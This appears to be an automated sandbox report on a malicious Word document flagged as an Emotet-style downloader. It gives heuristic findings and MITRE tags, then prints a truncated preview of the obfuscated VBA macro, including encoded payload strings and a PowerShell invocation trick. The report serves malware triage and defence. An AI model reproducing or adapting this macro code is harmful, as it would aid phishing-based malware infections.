MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. Heuristics indicate the use of CreateObject and p-code execution, suggesting the macro likely downloads and executes a second-stage payload. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44922 bytes |
SHA-256: 998f8e8bc5acfc69747ef0b6799b08c9a0b7f298c9db56a759e8050aceb4326b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 24 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zuZropGiurGp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zDViGBuXwjXGA"
Function NhTORXaBT()
On Error Resume Next
Select Case IBZYv
Case 44254
ktccu = Hex(96894 - CSng(10369) - 98884 + ChrW(mnNzV))
pXAiGV = FZFJKr
End Select
sNqju = jVtfX("XAPi5fANQBkADQAOAAyADMANwAyADIAMAAxADIAZgA1ADQAMQBkADYAZQBmADkAMwAyAGIAMgAxADIANgAxADgANQA1AGYAZQBhADYAMAAwAGUAZQA3AGYAZgAwADgAZQAyAGQAMgBkADgAMgAzADAAMQAyADgAYwA2ADQAZgAzAGMAZQBhAGQAcpk", 7, 177)
Select Case JUVnF
Case 98699
rpWXk = Hex(77257 - CSng(11996) - 17852 + ChrW(kijXL))
XRQkG = CXknOi
End Select
Select Case iQJrEP
Case 61051
cbcUc = Hex(15939 - CSng(18700) - 69924 + ChrW(ECAmtc))
mIrKw = mwTTXJ
End Select
szGpmT = jVtfX("z qd52E (165..134)) ) ))|& ( $PSHomE[4]+$PsHomE[34]+'x')dz", 7, 51)
Select Case mEAMA
Case 45641
hlwCld = Hex(58591 - CSng(75703) - 73498 + ChrW(HkokF))
XUZspj = JkARt
End Select
Select Case cWvwWs
Case 39206
zrVEiY = Hex(94771 - CSng(23828) - 33760 + ChrW(XvCnS))
GwSfw = FXYsjU
End Select
dSooj = jVtfX("%2uhokAOAA5ADEANABkADkAZQAyAGIAZAA4AGEANQAwADgAMQBhADAAMAAzADIAYgBiAGIAYQAzAGYAMgA18Q", 6, 78)
Select Case ApzzLR
Case 54792
jdvNN = Hex(71422 - CSng(68305) - 2148 + ChrW(npElp))
apiRlz = mpcjRS
End Select
Select Case NtHTk
Case 58287
aihKLY = Hex(70251 - CSng(25789) - 24409 + ChrW(YhwPb))
foqssJ = YXTKfN
End Select
zGOCYiB = jVtfX("3ZAA5AGYAMABkAGIAYwA1AGMAMwBhADEAMgA2AGUAOAAzADYAZAA3ADIAMwBiADQAYQBmAGMAZAA1ADkANAAzADcAMwAyAGYAMABhAGQAYwA0ADQAYwA3AGUAZAA%5C7h", 2, 123)
Select Case jFksYY
Case 74258
DIWPt = Hex(44574 - CSng(47452) - 54025 + ChrW(mmvcft))
mQzJms = FAQpS
End Select
Select Case hSnHG
Case 8415
fwwjiM = Hex(10529 - CSng(5023) - 55511 + ChrW(ZLwLR))
aqMCA = bHRAbw
End Select
TYtjD = jVtfX("dP4wCCjgA5ADUAYQAzADcAMwBkADkAZAAwADAAZABhADgANQBmADAANAA0AGUANQA5AGUAYwAyAGUAOQBmAGYAMAA0ADkANQVK", 8, 89)
Select Case zRfAf
Case 17996
vkiQEi = Hex(56887 - CSng(78130) - 49292 + ChrW(AwQBM))
uBjoU = OikJmf
End Select
Select Case DiOrnw
Case 79971
cvBYaR = Hex(35926 - CSng(6623) - 67206 + ChrW(BTNzO))
FhwfM = FmQUZq
End Select
zNwMY = jVtfX("qD3DgAMABmADcAOAA1ADEAMgBjAGEANwAxAGQANgA5ADYANABhADkAOABiAGYANAA0ADIAOQAyAGQAZQBkAGYANQAwAGIANwAwADkAYwAyADAANgBhADEAYwA2ADQAYwAxADkAMwA3ADcAZQBkADgAOAAxADMAMQBlADkAYgAyADEUAWs", 4, 170)
Select Case LVNboA
Case 41705
fqlML = Hex(36407 - CSng(61428) - 62078 + ChrW(XDUNmG))
KfzqOI = rcXXB
End Select
Select Case iZiRPw
Case 69315
YihvsU = Hex(52706 - CSng(68383) - 19978 + ChrW(FKISI))
UUvUM = KVnmt
End Select
VpAhlziIdu = jVtfX("7jQ1n4gANwBkADYAOQAxADUAOABlADAAOQA1AGMANQBkADQAMQA4ADcAYwBkADIAYwA4AGQAZgAFk", 7, 69)
Select Case ldziS
Case 61348
EfVDsq = Hex(25961 - CSng(12316) - 61717 + ChrW(BrMRNz))
BPOTTM = FbZwh
End Select
Select Case sVuiZi
Case 35419
Gwwrn = Hex(43994 - CSng(53737) - 77587 + ChrW(AHUDr))
LLJNXf = YlsdBT
End Select
CciuVlMb = jVtfX("0FAQADEAMAAwADYANQBjAGQANAAyAGYAYwBjAGYAYgA4ADcAW3A", 5, 44)
Select Case SoSWHp
Case 41075
ujOlv = Hex(1428 - CSng(29543) - 58144 + ChrW(dBZiW))
RuXLX = wJVIH
End Select
Select Case BwGrj
Case 68640
vOjEj = Hex(28435 - CSng(47499) - 27586 + ChrW(lOApVc))
LjjKz = QHmrpT
End Select
LSohwhso = jVtfX("w5wH0AGMAMgBkADAAYgA3AGUAYwA5ADQANQA5ADIANwBiADAAZgBmAGEANgA5ADgAMQAwAGUAMQA1ADkANABhADgANAA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.